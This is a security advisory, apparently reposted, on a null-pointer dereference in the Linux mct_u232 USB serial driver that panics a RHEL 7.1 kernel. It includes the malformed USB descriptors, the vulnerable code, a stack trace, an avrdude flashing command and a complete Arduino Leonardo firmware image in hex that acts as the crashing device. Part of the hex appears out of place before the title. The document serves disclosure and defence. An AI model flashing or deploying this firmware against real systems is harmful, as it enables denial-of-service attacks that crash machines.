:10168400656A20536368756D696C6F20323031353B
:101694002C204F70656E536F7572636520536563BC
:1016A40075726974792052616C66205370656E6E30
:1016B4006562657267203E3E0A0D000A3E3E205078
:1016C4007265737320627574746F6E20746F207307
:1016D4007461727420657865637574696F6E2E2EFB
:1016E4002E0A0D005B44454255475D2045786563ED
:1016F400757465207061796C6F616420300A0D0027
:10170400526563762D446174613A0A0D005B444569
:101714004255475D200953656E6420436F6E6669C8
:101724006775726174696F6E44657363726970740E
:101734006F720928696E6465783A2569292E2E2E00
:101744000D0A005B44454255475D200953656E64AC
:1017540020496E74657266616365204465736372C3
:101764006970746F720928696E7465726661636565
:101774003A2569292E2E2E0D0A005B444542554711
:101784005D200953656E6420456E64706F696E74E4
:101794002044657363726970746F720928656E649E
:1017A400706F696E743A2569292E2E2E0D0A005B1E
:1017B40044454255475D203C3C70616E6963206D31
:1017C4006F64653F3E3E0D0A005B44454255475DEC
:1017D4002009203E3E20537472696E67204465736D
:1017E40063726970746F72207265717565737420A9
:1017F4002D2073656E64696E67206D616C666F720F
:101804006D656420737472696E67212073657475E5
:10181400702E7756616C75654C203D3D2025690D11
:101824000A005B48455844554D505D0A0D0025306B
:041834003258200006
:00000001FF
HireHackking 
OS-S Security Advisory 2016-08
Linux mct_u232 Nullpointer Dereference

Date: March 4th, 2016
Authors: Sergej Schumilo, Hendrik Schwartke, Ralf Spenneberg
CVE: not yet assigned
CVSS: 4.9 (AV:L/AC:L/Au:N/C:N/I:N/A:C)
Title: Local RedHat Enterprise Linux DoS â?? RHEL 7.1 Kernel crashes on invalid 
USB device descriptors (mct_u232_m8 driver)
Severity: Critical. The Kernel panics. A reboot is required.
Ease of Exploitation: Trivial
Vulnerability type: Wrong input validation
Products: RHEL 7.1 including all updates
Kernel-Version: 3.10.0-229.20.1.el7.x86_64 (for debugging-purposes we used the 
CentOS Kernel kernel-debuginfo-3.10.0-229.14.1.el7)
Vendor: Red Hat
Vendor contacted: November, 12th 2015
PDF of advisory: https://os-s.net/advisories/OSS-2016-08_mct_u232.pdf

Abstract:
The Kernel 3.10.0-229.20.1.el7.x86_64 crashes on presentation of a buggy USB 
device requiring the mct_u232_m8 driver.

Detailed product description:
We confirmed the bug on the following system:
RHEL 7.1
Kernel 3.10.0-229.20.1.el7.x86_64
Further products or kernel versions have not been tested.
How reproducible: Always
Actual results: Kernel crashes.

Description:
The bug was found using the USB-fuzzing framework vUSBf from Sergej Schumilo 
(github.com/schumilo) using the following device descriptor:

[*] Device-Descriptor
bLength:	0x12
bDescriptorType:	0x1
bcdUSB:	0x200
bDeviceClass:	0x3
bDeviceSubClass:	0x0
bDeviceProtocol:	0x0
bMaxPacketSize:	0x40
idVendor:	0x50d
idProduct:	0x109
bcdDevice:	0x100
iManufacturer:	0x1
iProduct:	0x2
iSerialNumbers:	0x3
bNumConfigurations:	0x1

This is the configuration descriptor containing only one interrupt-endpoint-
descriptor (IN-direction).
The mct_u232 driver assumes that there will be at least two endpoint-
descriptors configured as interrupt-in.
Since there is no sanity check, it is possible that the kernel tries to 
dereference a null-pointer.
This results in a crash of the system.

****
$ nm mct_u232.ko.debug | grep mct_u232_port_probe
0000000000000fc0 t mct_u232_port_probe
$ addr2line -e mct_u232.ko.debug 0xFF9
/usr/src/debug/kernel-3.10.0-229.14.1.el7/linux-3.10.0-229.14.1.el7.x86_
64/drivers/usb/serial/mct_u232.c:386
****

**** CentOS-Kernel linux-3.10.0-229.14.1.el7 (drivers/usb/serial/mct_u232.c)
...
377 static int mct_u232_port_probe(struct usb_serial_port *port)
378 {
379 struct mct_u232_private *priv;
380
381 priv = kzalloc(sizeof(*priv), GFP_KERNEL);
382 if (!priv)
383 return -ENOMEM;
384
385 /* Use second interrupt-in endpoint for reading. */
386 priv->read_urb = port->serial->port[1]->interrupt_in_urb; /* missing 
sanity check -> possible null-pointer dereference */
387 priv->read_urb->context = port;
388
389 spin_lock_init(&priv->lock);
390
391 usb_set_serial_port_data(port, priv);
392
393 return 0;
395 }
...
****

[*] Configuration-Descriptor
bLength:	0x9
bDescriptorType:	0x2
wTotalLength:	0x27
bNumInterfaces:	0x1
bConfigurationValue:	0x1
iConfiguration:	0x0
bmAttributes:	0x0
bMaxPower:	0x31
[*] Interface-Descriptor
bLength:	0x9
bDescriptorType:	0x4
bInterfaceNumber:	0x0
bAlternateSetting:	0x0
bNumEndpoints:	0x3
bInterfaceClass:	0x0
bInterfaceSubClass:	0x0
bInterfaceProtocol:	0x0
[*] Endpoint-Descriptor:
bLength:	0x7
bDescriptorType:	0x5
bEndpointAddress:	0x81	ï?? IN-Direction
bmAttribut:	0x3	ï?? Interrupt-Transfer
wMaxPacketSize:	0x404
bInterval:	0xc
[*] Endpoint-Descriptor:
bLength:	0x7
bDescriptorType:	0x5
bEndpointAddress:	0x1	ï??OUT-Direction
bmAttribut:	0x2	ï??Bulk-Transfer
wMaxPacketSize:	0x4
bInterval:	0xc
[*] Endpoint-Descriptor:
bLength:	0x7
bDescriptorType:	0x5
bEndpointAddress:	0x82	ï??IN-Direction
bmAttribut:	0x1	ï??Bulk-Transfer
wMaxPacketSize:	0x4
bInterval:	0xc

Proof of Concept:
For a proof of concept, we are providing an Arduino Leonardo firmware file. This 
firmware will emulate the defective USB device.

avrdude -v -p ATMEGA32u4 -c avr109 -P /dev/ttyACM0 -b 57600 -U 
flash:w:binary.hex

The firmware has been attached to this bug report.
To prevent the automated delivery of the payload, a jumper may be used to 
connect port D3 and 3V3!

Severity and Ease of Exploitation:
The vulnerability can be easily exploited. Using our Arduino Leonardo firmware, 
only physical access to the system is required.

Vendor Communication:
We contacted Red Hat on the November, 12th 2015.
To this day, no security patch was provided by the vendor.
Since our 90-day Responsible Discourse deadline is expired, we publish this 
Security Advisory.

References:
https://bugzilla.redhat.com/show_bug.cgi?id=1283370

Kernel Stacktrace:

[ 2273.524650] usb 1-1: new full-speed USB device number 2 using xhci_hcd
[ 2273.741789] usb 1-1: New USB device found, idVendor=050d, idProduct=0109
[ 2273.749429] usb 1-1: New USB device strings: Mfr=1, Product=2, 
SerialNumber=3
[ 2273.757144] usb 1-1: Product: Ä?
[ 2273.760821] usb 1-1: Manufacturer: Ä?
[ 2273.763500] usb 1-1: SerialNumber: %
[ 2273.768699] usb 1-1: ep 0x81 - rounding interval to 64 microframes, ep desc 
says 96 microframes
[ 2273.814069] usbcore: registered new interface driver mct_u232
[ 2273.820979] usbserial: USB Serial support registered for MCT U232
[ 2273.833864] mct_u232 1-1:1.0: MCT U232 converter detected
[ 2273.838511] BUG: unable to handle kernel NULL pointer dereference at 
0000000000000158
[ 2273.839330] IP: [<ffffffffa0393ff9>] mct_u232_port_probe+0x39/0x70 [mct_u232]
[ 2273.839330] PGD 0 
[ 2273.839330] Oops: 0000 [#1] SMP 
[ 2273.839330] Modules linked in: mct_u232(+) ip6t_rpfilter ip6t_REJECT 
ipt_REJECT xt_conntrack ebtable_nat ebtable_broute bridge stp llc 
ebtable_filter ebtables ip6table_nat nf_conntrack_ipv6 nf_defrag_ipv6 
nf_nat_ipv6 ip6table_mangle ip6table_security ip6table_raw ip6table_filter 
ip6_tables iptable_nat nf_conntrack_ipv4 nf_defrag_ipv4 nf_nat_ipv4 nf_nat 
nf_conntrack iptable_mangle iptable_security iptable_raw iptable_filter 
ip_tables bochs_drm ppdev syscopyarea sysfillrect sysimgblt ttm drm_kms_helper 
drm pcspkr i2c_piix4 i2c_core serio_raw parport_pc parport xfs libcrc32c 
sd_mod sr_mod crc_t10dif cdrom crct10dif_common ata_generic pata_acpi ata_piix 
libata e1000 floppy dm_mirror dm_region_hash dm_log dm_mod
[ 2273.839330] CPU: 0 PID: 8890 Comm: systemd-udevd Not tainted 
3.10.0-229.14.1.el7.x86_64 #1
[ 2273.839330] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 
rel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014
[ 2273.839330] task: ffff88000f546660 ti: ffff88000f4cc000 task.ti: ffff88000f4cc000
[ 2273.839330] RIP: 0010:[<ffffffffa0393ff9>] [<ffffffffa0393ff9>] 
mct_u232_port_probe+0x39/0x70 [mct_u232]
[ 2273.839330] RSP: 0018:ffff88000f4cf908 EFLAGS: 00010286
[ 2273.839330] RAX: ffff88000d9b49a0 RBX: ffff88000c34e800 RCX: 0000000000000000
[ 2273.839330] RDX: 0000000000000000 RSI: ffff88000d9b49a0 RDI: ffff88000c34eab0
[ 2273.839330] RBP: ffff88000f4cf910 R08: 00000000000163c0 R09: ffff88000e401c00
[ 2273.839330] R10: ffffffffa0393fe3 R11: 0000000000000004 R12: 0000000000000000
[ 2273.839330] R13: ffff88000c34e800 R14: ffffffffa0396000 R15: ffffffffa0396000
[ 2273.839330] FS: 00007fb8082b4880(0000) GS:ffff88000fc00000(0000) 
knlGS:0000000000000000
[ 2273.839330] CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b
[ 2273.839330] CR2: 0000000000000158 CR3: 000000000f70c000 CR4: 
00000000000006f0
[ 2273.839330] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 
0000000000000000
[ 2273.839330] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400
[ 2273.839330] Stack:
[ 2273.839330] ffff88000c34eab0 ffff88000f4cf940 ffffffff81461cf6 ffff88000c34eab0
[ 2273.839330] ffff88000c34eab0 ffffffffa0396028 ffff88000c34eab0 ffff88000f4cf968
[ 2273.839330] ffffffff813d30d7 ffffffffa0396028 ffff88000c34eab0 ffffffff813d33e0
[ 2273.839330] Call Trace:
[ 2273.839330] [<ffffffff81461cf6>] usb_serial_device_probe+0x56/0x110
[ 2273.839330] [<ffffffff813d30d7>] driver_probe_device+0x87/0x390
[ 2273.839330] [<ffffffff813d33e0>] ? driver_probe_device+0x390/0x390
[ 2273.839330] [<ffffffff813d341b>] __device_attach+0x3b/0x40
[ 2273.839330] [<ffffffff813d0f1b>] bus_for_each_drv+0x6b/0xb0
[ 2273.839330] [<ffffffff813d2fd8>] device_attach+0x88/0xa0
[ 2273.839330] [<ffffffff813d22d8>] bus_probe_device+0x98/0xc0
[ 2273.839330] [<ffffffff813cfd64>] device_add+0x4c4/0x7a0
[ 2273.839330] [<ffffffff81460243>] usb_serial_probe+0x1123/0x1230
[ 2273.839330] [<ffffffff812d649c>] ? ida_get_new_above+0x7c/0x2a0
[ 2273.839330] [<ffffffff811aba6a>] ? kmem_cache_alloc+0x1ba/0x1d0
[ 2273.839330] [<ffffffff8123e5b2>] ? sysfs_addrm_finish+0x42/0xe0
[ 2273.839330] [<ffffffff8123e391>] ? __sysfs_add_one+0x61/0x100
[ 2273.839330] [<ffffffff8141dc04>] usb_probe_interface+0x1c4/0x2f0
[ 2273.839330] [<ffffffff813d30d7>] driver_probe_device+0x87/0x390
[ 2273.839330] [<ffffffff813d34b3>] __driver_attach+0x93/0xa0
[ 2273.839330] [<ffffffff813d3420>] ? __device_attach+0x40/0x40
[ 2273.839330] [<ffffffff813d0e43>] bus_for_each_dev+0x73/0xc0
[ 2273.839330] [<ffffffff813d2b2e>] driver_attach+0x1e/0x20
[ 2273.839330] [<ffffffff8145ec4b>] usb_serial_register_drivers+0x29b/0x580
[ 2273.839330] [<ffffffffa0399000>] ? 0xffffffffa0398fff
[ 2273.839330] [<ffffffffa039901e>] usb_serial_module_init+0x1e/0x1000 [mct_u232]
[ 2273.839330] [<ffffffff810020e8>] do_one_initcall+0xb8/0x230
[ 2273.839330] [<ffffffff810dd0ee>] load_module+0x133e/0x1b40
[ 2273.839330] [<ffffffff812f7d60>] ? ddebug_proc_write+0xf0/0xf0
[ 2273.839330] [<ffffffff810d96b3>] ? copy_module_from_fd.isra.42+0x53/0x150
[ 2273.839330] [<ffffffff810ddaa6>] SyS_finit_module+0xa6/0xd0
[ 2273.839330] [<ffffffff81614389>] system_call_fastpath+0x16/0x1b
[ 2273.839330] Code: 00 00 48 89 e5 53 48 89 fb 48 8b 3d aa 3e aa e1 e8 9d 7a 
e1 e0 48 85 c0 74 38 48 8b 13 48 8d bb b0 02 00 00 48 89 c6 48 8b 52 28 <48> 
8b 92 58 01 00 00 48 89 10 48 89 9a b0 00 00 00 c7 40 08 00 
[ 2273.839330] RIP [<ffffffffa0393ff9>] mct_u232_port_probe+0x39/0x70 [mct_u232]
[ 2273.839330] RSP <ffff88000f4cf908>
[ 2273.839330] CR2: 0000000000000158
[ 2274.348716] ---[ end trace b239663354a1c556 ]---
[ 2274.356144] Kernel panic - not syncing: Fatal exception
[ 2274.357102] drm_kms_helper: panic occurred, switching back to text console

Arduino Leonardo Firmware:

:100000000C94A8000C94C5000C94C5000C94C50079
:100010000C94C5000C94C5000C94C5000C94C5004C
:100020000C94C5000C94C5000C94C4050C942F04CA
:100030000C94C5000C94C5000C94C5000C94C5002C
:100040000C94C5000C94C5000C94C5000C94C5001C
:100050000C94C5000C94C5000C94C5000C940E02C1
:100060000C94C5000C94C5000C94C5000C94C500FC
:100070000C94C5000C94C5000C94C5000C94C500EC
:100080000C94C5000C94C5000C94C5000C94C500DC
:100090000C94C5000C94C5000C94C5000C94C500CC
:1000A0000C94C5000C94C5000C94C5000B030E0302
:1000B000010305032F032F032F03120316031A0353
:1000C000200324032F032A030000000200080E006F
:1000D00000030401000B000000000000000000000D
:1000E00000000000000004080201104080401020C1
:1000F00040804080080204018040201002011080EE
:100100001020404004040404040304050202020217
:1001100004030202020206060606060604040202A0
:100120000204000000002300260029002C002F00FC
:1001300000000000250028002B002E0031000000E8
:100140000000240027002A002D00300000C180811B
:1001500011241FBECFEFDAE0DEBFCDBF15E0A0E077
:10016000B1E0E4EDF3E102C005900D92A436B107D1
:10017000D9F725E0A4E6B5E001C01D92AF37B2077C
:10018000E1F70E94C8000C9404070C940000089545
:10019000CF93DF93CDB7DEB7CD59D1090FB6F89421
:1001A000DEBF0FBECDBF0E94A1020E94C70060E06B
:1001B00083E00E94300361E087E00E94300361E049
:1001C00088E00E9430030E9459067E012AE9E20E6F
:1001D000F11C84E093E0D70111969C938E9389E003
:1001E00094E013969C938E93129782E2E2E1F1E001
:1001F0009E012F5F3F4F6901D90101900D928A95B1
:10020000E1F788E1E4E3F1E0DE01939601900D92DD
:100210008A95E1F782E1ECE4F1E0DE01DB96019002
:100220000D928A95E1F789E0EEE5F1E0DE01A05953
:10023000BF4F01900D928A95E1F72A593F4F99E0FF
:10024000992ED901E92D1D92EA95E9F78E010957FA
:100250001F4F87E0E7E6F1E0D80101900D928A9503
:10026000E1F7BE0160587F4F87E0EEE6F1E0DB0189
:1002700001900D928A95E1F7AE0147585F4F87E0F4
:10028000E5E7F1E0DA0101900D928A95E1F75E0170
:10029000FEE8AF0EB11C86E0ECE7F1E0D50101907D
:1002A0000D928A95E1F7CE01835B9F4FEEE0DC0172
:1002B0001D92EA95E9F7E3E0DC011996EC93D90188
:1002C0009C92F4E01196FC9311971496EC93F9012B
:1002D000DC01292D01900D922A95E1F7FE01EC56E3
:1002E000FF4FDC011B96FC93EE931A971D96BC9270
:1002F000AE921C971183008373836283558344837A
:100300000C5211092CE0F80111922A95E9F721E02D
:10031000D80119962C931997FE01E059FF4F0190CF
:100320000D929A94E1F7F8019387828761E088E063
:100330000E9469038BE492E00E94650688E892E0DF
:100340000E94650687EC92E00E94650686E093E0D5
:100350000E94650682E493E00E9465068FE793E0C1
:100360000E94650684EA93E00E9465068BEE93E0A6
:100370000E94650683E00E949F03892B09F047C015
:100380005E01F3E2AF0EB11C8824839482E1982EC3
:1003900084E194E00E946506BF92AF92DF92CF9213
:1003A000FF92EF921F928F921F930F932DB73EB73C
:1003B000225131090FB6F8943EBF0FBE2DBFADB725
:1003C000BEB71196FE01FB96892D01900D928A957C
:1003D000E1F78DE695E00E94030668E873E180E0AE
:1003E00090E00E947B028DE695E00E944E0660E060
:1003F00087E00E94690368E873E180E090E00E9472
:100400007B020FB6F894DEBF0FBECDBFC1CF6AE04E
:1004100070E080E090E00E947B02ACCF1F920F92D0
:100420000FB60F9211242F933F938F939F93AF9307
:10043000BF938091650590916605A0916705B09185
:1004400068053091640523E0230F2D3720F40196D1
:10045000A11DB11D05C026E8230F0296A11DB11DE7
:10046000209364058093650590936605A0936705C6
:10047000B09368058091690590916A05A0916B051C
:10048000B0916C050196A11DB11D809369059093F3
:100490006A05A0936B05B0936C05BF91AF919F91D6
:1004A0008F913F912F910F900FBE0F901F90189535
:1004B0003FB7F8948091690590916A05A0916B050A
:1004C000B0916C0526B5A89B05C02F3F19F0019689
:1004D000A11DB11D3FBF6627782F892F9A2F620F6C
:1004E000711D811D911D42E0660F771F881F991FA6
:1004F0004A95D1F70895CF92DF92EF92FF92CF9372
:10050000DF936B017C010E945802EB01C114D104FE
:10051000E104F10479F00E9458026C1B7D0B683EE7
:100520007340A0F381E0C81AD108E108F108C8516E
:10053000DC4FECCFDF91CF91FF90EF90DF90CF9029
:100540000895789484B5826084BD84B5816084BD4B
:1005500085B5826085BD85B5816085BDEEE6F0E03C
:10056000808181608083E1E8F0E010828081826098
:100570008083808181608083E0E8F0E08081816019
:100580008083E1E9F0E08081826080838081816006
:100590008083E0E9F0E0808181608083E1ECF0E03D
:1005A000808184608083808182608083808181609B
:1005B0008083E3ECF0E0808181608083E0ECF0E018
:1005C000808182608083E2ECF0E0808181608083C2
:1005D000EAE7F0E0808184608083808182608083AC
:1005E000808181608083808180688083089590E02D
:1005F000FC013197EE30F10590F5EA5AFF4F0C946B
:10060000AB09809180008F7703C0809180008F7D3F
:1006100080938000089584B58F7702C084B58F7D64
:1006200084BD0895809190008F7707C080919000DD
:100630008F7D03C080919000877F80939000089504
:100640008091C0008F7703C08091C0008F7D809320
:10065000C00008958091C200877F8093C2000895F2
:10066000CF93DF9390E0FC01EA51FF4F2491FC010E
:10067000EC5FFE4F8491882349F190E0880F991F29
:10068000FC01E25CFE4FA591B491805D9E4FFC01A0
:10069000C591D4919FB7611108C0F8948C912095B1
:1006A00082238C93888182230AC0623051F4F894AB
:1006B0008C91322F309583238C938881822B888371
:1006C00004C0F8948C91822B8C939FBFDF91CF91C3
:1006D00008950F931F93CF93DF931F92CDB7DEB78B
:1006E000282F30E0F901E853FF4F8491F901EA51D6
:1006F000FF4F1491F901EC5FFE4F04910023C9F004
:10070000882321F069830E94F7026981E02FF0E0DD
:10071000EE0FFF1FE05DFE4FA591B4919FB7F894D7
:100720008C91611103C01095812301C0812B8C93A2
:100730009FBF0F90DF91CF911F910F910895CF939D
:10074000DF93282F30E0F901E853FF4F8491F9013E
:10075000EA51FF4FD491F901EC5FFE4FC491CC23D5
:1007600091F081110E94F702EC2FF0E0EE0FFF1FD5
:10077000EE5DFE4FA591B4912C912D2381E090E088
:1007800021F480E002C080E090E0DF91CF910895F5
:10079000615030F02091F100FC0120830196F8CFE8
:1007A000289884E680937D0508951092E9001092C0
:1007B00071051092700590936F0580936E050895F2
:1007C000FF920F931F93CF93DF93F82E8B01EA01D3
:1007D000BA01C8010E94A606F80120E030E08EEFC1
:1007E0002C173D0791F1F7FE02C0A49101C0A08132
:1007F000609170057091710540916E0550916F0583
:1008000064177507ACF49091E8009570E1F390914E
:10081000E80092FD1CC0A093F100A0917005B0917A
:1008200071051196AF73BB27AB2B11F48093E800D1
:10083000A0917005B09171051196B0937105A093C8
:1008400070052F5F3F4F3196CBCFC90102C08FEFAC
:100850009FEFDF91CF911F910F91FF9008951F920D
:100860000F920FB60F9211246F927F928F929F92E8
:10087000AF92BF92CF92DF92EF92FF920F931F93AE
:100880002F933F934F935F936F937F938F939F9398
:10089000AF93BF93EF93FF93CF93DF93CDB7DEB7C3
:1008A0006297DEBFCDBF1092E9008091E80083FF20
:1008B00046C168E0CE010A960E94C80382EF809389
:1008C000E8009A8597FF05C08091E80080FFFCCF83
:1008D00003C08EEF8093E800892F807609F023C152
:1008E0008B85811105C01092F1001092F10020C19A
:1008F000282F2D7F213009F41BC1853049F48091C8
:10090000E80080FFFCCF8C8580688093E30010C1F5
:10091000863009F0E1C02D8508891989223009F057
:10092000B3C0EC848E2D90E0209173053091740556
:10093000821793070CF09FC00E94D5031F92EF927D
:100940008DE394E09F938F930E9483068CE0E89E52
:1009500070011124E0917505F0917605EE0DFF1DF3
:1009600089E0DE01119601900D928A95E1F7C801A8
:100970000E94D50349E050E0BE016F5F7F4F80E0E9
:100980000E94E0030F900F900F900F90C12CD12C7C
:10099000612C712C33E7A32E34E0B32E4AEA842E67
:1009A00044E0942EE0917505F0917605EE0DFF1D63
:1009B000818590E0681679060CF0BAC07F926F923C
:1009C000BF92AF920E948306E0917505F091760583
:1009D000EE0DFF1D628573856C0D7D1D49E050E0B5
:1009E00080E00E94E0030F900F900F900F9000E0C6
:1009F00010E0E0917505F0917605EE0DFF1D028483
:100A0000F385E02DEC0DFD1D818590E00817190799
:100A10005CF51F930F939F928F920E948306E09143
:100A20007505F0917605EE0DFF1D0284F385E02D2E
:100A3000EC0DFD1DC801880F991FA485B585A80F71
:100A4000B91F4D915C910284F385E02DE80FF91FE9
:100A50006081718180E00E94E0030F5F1F4F0F9063
:100A60000F900F900F90C5CF8FEF681A780A8EE025
:100A7000C80ED11C97CF8FED94E09F938F930E9467
:100A800083060F900F9058C0C8012A8B0E94D5038F
:100A90002A892130C1F0233009F04EC08C851F9285
:100AA0008F9389EF94E09F938F930E94830642E097
:100AB00050E062E871E080E00E94E0030F900F9048
:100AC0000F900F9035C04091000150E060E071E060
:100AD00080E00E94E0032CC0873071F1883021F45F
:100AE00081E08093F10024C0893011F5937021F5E5
:100AF000EDE4F1E081E021E096E38093E9002093CA
:100B0000EB0034913093EC009093ED008F5F3196C1
:100B1000843099F78EE78093EA001092EA008C8582
:100B20008093720505C0888999890E94D50304C005
:100B30008EEF8093E80003C081E28093EB00629621
:100B40000FB6F894DEBF0FBECDBFDF91CF91FF91FE
:100B5000EF91BF91AF919F918F917F916F915F9135
:100B60004F913F912F911F910F91FF90EF90DF9048
:100B7000CF90BF90AF909F908F907F906F900F908D
:100B80000FBE0F901F9018951F920F920FB60F92E5
:100B900011248F939F938091E1001092E10083FFD5
:100BA0000FC01092E90091E09093EB001092EC00DE
:100BB00092E39093ED001092720598E09093F0000C
:100BC00082FF1AC080917E05882339F080917E05CE
:100BD000815080937E05882369F080917D0588236C
:100BE00059F080917D05815080937D05811104C06D
:100BF000289A02C05D9AF1CF9F918F910F900FBEFE
:100C00000F901F901895CF93DF93CDB7DEB782E199
:100C1000FE013596A0E0B1E001900D928A95E1F7D2
:100C20008F89988D9093760580937505898D9A8D1F
:100C300090937405809373058B8D9C8D90937C05A8
:100C400080937B058D8D9E8D90937A058093790599
:100C50008F8D98A1909378058093770510927205F7
:100C600081E08093D70080EA8093D80082E189BD3B
:100C700009B400FEFDCF61E070E080E090E00E94EA
:100C80007B0280E98093D8008CE08093E200109290
:100C9000E000559A209ADF91CF91089581E08093EA
:100CA000E00008959091C80095FFFCCF8093CE009E
:100CB00008951092CD0087E68093CC0088E1809360
:100CC000C9008EE08093CA0008950F931F93CF93BD
:100CD000DF93EC018C01FE0101900020E9F73197D0
:100CE000EC1BFD0BC8018C1B9D0B8E179F0730F46E
:100CF000F80181918F010E945206EDCFDF91CF91D3
:100D00001F910F910895CF93DF93CDB7DEB7DA959A
:100D10000FB6F894DEBF0FBECDBFFE01EB5FFE4FF6
:100D2000419151919F0160E071E0CE0101960E94D6
:100D30000707CE0101960E946506D3950FB6F89479
:100D4000DEBF0FBECDBFDF91CF9108958F929F92EE
:100D5000AF92BF92CF92DF92EF92FF920F931F93C9
:100D6000CF93DF9300D0CDB7DEB75B0122E535E04E
:100D70003F932F9389839A830E9483068981882ECB
:100D80009A81992E0F900F9000E010E08EE5E82EEA
:100D900085E0F82E91E1C92E94E0D92E0A151B05A5
:100DA000E4F4F40181914F0190E09F938F93FF92BF
:100DB000EF920E9483060F5F1F4FC8018F70992723
:100DC0000F900F900F900F90892B41F7DF92CF92E9
:100DD0000E9483060F900F90E1CF81E194E09F93F2
:100DE0008F930E9483060F900F900F900F90DF91CA
:100DF000CF911F910F91FF90EF90DF90CF90BF9018
:100E0000AF909F908F900895F8940C94E809AEE00D
:100E1000B0E0EDE0F7E00C94BF098C01CA0146E0B8
:100E20004C831A83098377FF02C060E070E8615049
:100E300071097E836D83A901BC01CE0101960E94D8
:100E400033074D815E8157FD0AC02F8138854217D7
:100E500053070CF49A01F801E20FF31F10822E964B
:100E6000E4E00C94DB09ACE0B0E0E9E3F7E00C94DB
:100E7000B1097C016B018A01FC0117821682838112
:100E800081FFBDC1CE0101964C01F7019381F601AE
:100E900093FD859193FF81916F01882309F4ABC184
:100EA000853239F493FD859193FF81916F018532ED
:100EB00029F4B70190E00E941B09E7CF512C312C97
:100EC00020E02032A0F48B3269F030F4803259F007
:100ED000833269F420612CC08D3239F0803339F4CB
:100EE000216026C02260246023C0286021C027FD25
:100EF00027C030ED380F3A3078F426FF06C0FAE00C
:100F00005F9E300D1124532E13C08AE0389E300DA1
:100F10001124332E20620CC08E3221F426FD6BC1C9
:100F2000206406C08C3611F4206802C0883641F473
:100F3000F60193FD859193FF81916F018111C1CFDE
:100F4000982F9F7D9554933028F40C5F1F4FFFE33B
:100F5000F9830DC0833631F0833771F0833509F0A2
:100F60005BC022C0F801808189830E5F1F4F44243B
:100F70004394512C540115C03801F2E06F0E711CDE
:100F8000F801A080B18026FF03C0652D70E002C08B
:100F90006FEF7FEFC5012C870E9410092C018301A0
:100FA0002C852F77222E17C03801F2E06F0E711CAE
:100FB000F801A080B18026FF03C0652D70E002C05B
:100FC0006FEF7FEFC5012C870E9405092C012C854E
:100FD0002068222E830123FC1BC0832D90E048163D
:100FE0005906B0F4B70180E290E00E941B093A94E0
:100FF000F4CFF50127FC859127FE81915F01B701B0
:1010000090E00E941B0931103A94F1E04F1A510808
:101010004114510471F7E5C0843611F0893639F571
:10102000F80127FF07C060817181828193810C5F85
:101030001F4F08C060817181882777FD8095982FA8
:101040000E5F1F4F2F76B22E97FF09C090958095A7
:10105000709561957F4F8F4F9F4F2068B22E2AE089
:1010600030E0A4010E944D09A82EA81844C085377D
:1010700029F42F7EB22E2AE030E025C0F22FF97F2E
:10108000BF2E8F36C1F018F4883579F0B4C08037A0
:1010900019F0883721F0AFC02F2F2061B22EB4FE97
:1010A0000DC08B2D8460B82E09C024FF0AC09F2F6D
:1010B0009660B92E06C028E030E005C020E130E09F
:1010C00002C020E132E0F801B7FE07C06081718103
:1010D000828193810C5F1F4F06C06081718180E027
:1010E00090E00E5F1F4FA4010E944D09A82EA81882
:1010F000FB2DFF77BF2EB6FE0BC02B2D2E7FA51428
:1011000050F4B4FE0AC0B2FC08C02B2D2E7E05C0E0
:101110007A2C2B2D03C07A2C01C0752C24FF0DC016
:10112000FE01EA0DF11D8081803311F4297E09C092
:1011300022FF06C07394739404C0822F867809F04E
:10114000739423FD13C020FF06C05A2C731418F4A7
:10115000530C5718732C731468F4B70180E290E0B5
:101160002C870E941B0973942C85F5CF731410F4FF
:10117000371801C0312C24FF12C0B70180E390E082
:101180002C870E941B092C8522FF17C021FF03C05A
:1011900088E590E002C088E790E0B7010CC0822F9C
:1011A000867859F021FD02C080E201C08BE227FD64
:1011B0008DE2B70190E00E941B09A51438F4B70135
:1011C00080E390E00E941B095A94F7CFAA94F4019F
:1011D000EA0DF11D8081B70190E00E941B09A1106A
:1011E000F5CF332009F451CEB70180E290E00E94A0
:1011F0001B093A94F6CFF7018681978102C08FEFE1
:101200009FEF2C96E2E10C94CD09FC010590615012
:1012100070400110D8F7809590958E0F9F1F08950C
:10122000FC016150704001900110D8F780959095B5
:101230008E0F9F1F08950F931F93CF93DF93182F47
:10124000092FEB018B8181FD03C08FEF9FEF20C041
:1012500082FF10C04E815F812C813D814217530770
:101260007CF4E881F9819F012F5F3F4F3983288308
:10127000108306C0E885F985812F0995892B29F708
:101280002E813F812F5F3F4F3F832E83812F902FF1
:10129000DF91CF911F910F910895FA01AA2728306D
:1012A00051F1203181F1E8946F936E7F6E5F7F4F33
:1012B0008F4F9F4FAF4FB1E03ED0B4E03CD0670FAF
:1012C000781F891F9A1FA11D680F791F8A1F911D02
:1012D000A11D6A0F711D811D911DA11D20D009F452
:1012E00068943F912AE0269F11243019305D319394
:1012F000DEF6CF010895462F4770405D4193B3E07D
:101300000FD0C9F7F6CF462F4F70405D4A3318F023
:10131000495D31FD4052419302D0A9F7EACFB4E0D4
:10132000A6959795879577956795BA95C9F700978C
:101330006105710508959B01AC010A2E069457952D
:10134000479537952795BA95C9F7620F731F841F84
:10135000951FA01D0895EE0FFF1F0590F491E02D3D
:1013600009942F923F924F925F926F927F928F9249
:101370009F92AF92BF92CF92DF92EF92FF920F9324
:101380001F93CF93DF93CDB7DEB7CA1BDB0B0FB62E
:10139000F894DEBF0FBECDBF09942A8839884888EB
:1013A0005F846E847D848C849B84AA84B984C88481
:1013B000DF80EE80FD800C811B81AA81B981CE0F78
:1013C000D11D0FB6F894DEBF0FBECDBFED0108955D
:0413D000F894FFCFBF
:1013D4001201000200000040AD0BEFBE000101024B
:1013E4000001220342006100640020004200410029
:1013F40042004500250078002500780025006E0095
:1014040025007000180342004100440020004300FE
:10141400300046004600450045002100120100024C
:10142400000000400D050901000101020301090249
:10143400270001010000FA0705810304040C0705D5
:10144400010204000C0705820104000C07000700D8
:101454000700480100500072006F006C00690066CC
:101464000069006300000A550000006BFD180A00C3
:10147400809F0AB901312B940A8101128946001315
:10148400000257028B0A5E0AF80A5F01F212010099
:1014940002010000400D055702000101020301B9D9
:1014A4000A0100F80A5F0A810A220342006100640B
:1014B400002000420041004200450025007800253C
:1014C40000780025006E00250070001803420041DA
:1014D400004400200043003000460046004500451B
:1014E40000210012010002010000400D0557020016
